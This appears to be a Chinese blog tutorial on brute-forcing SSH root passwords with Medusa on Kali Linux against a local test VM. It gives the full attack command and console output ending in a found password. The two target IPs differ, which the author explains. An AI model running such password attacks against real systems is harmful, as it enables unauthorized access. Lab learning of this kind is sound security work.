kali是啥就没必要介绍了,里面有大量的安全工具,基本搞安全的兄弟对这玩意或多或少都有接触,在kaili里用于破解ssh登录密码的工具,比较常用的就是medusa,打开控制台,直接输入 :medusa就会跳出这个工具的使用帮助:
上面的语法提示告知了这个工具的使用方法,我在本地搭建了测试环境,并制作了自己破解常用的字典,破解步骤如下:
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
在本次破解,使用的破解语句:medusa -h 192.168.171.135 -u root -P test.txt -M ssh
破解 的含义也不复杂:破解的目标是192.168.171.135 用户名是root,如果不知道用户名,可以用-U,里面保护一堆用户名字典,这样破解的速度会增加,毕竟会不断的去匹配用户名和密码,密码字典是test.txt,破解的功能是ssh
执行破解就好了:
root@kali:~# medusa -h 192.168.171.130 -u root -P Desktop/text.txt -M ssh Medusa v2.0 [https://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net> ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: admin (1 of 10 complete) ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 10 complete) ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: pass (3 of 10 complete) ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: test234 (4 of 10 complete) ACCOUNT FOUND: [ssh] Host: 192.168.171.130 User: root Password: test234[SUCCESS] root@kali:~#
这里出了点儿偏差:我的ip地址改了,因为我虚拟机里没装ssh。。。抱歉。。上面就测出登录密码了
很多事儿,上帝安排好了,凭着直觉去日吧
如对本文有疑问, 点击进行留言回复!!
我要评论
网友评论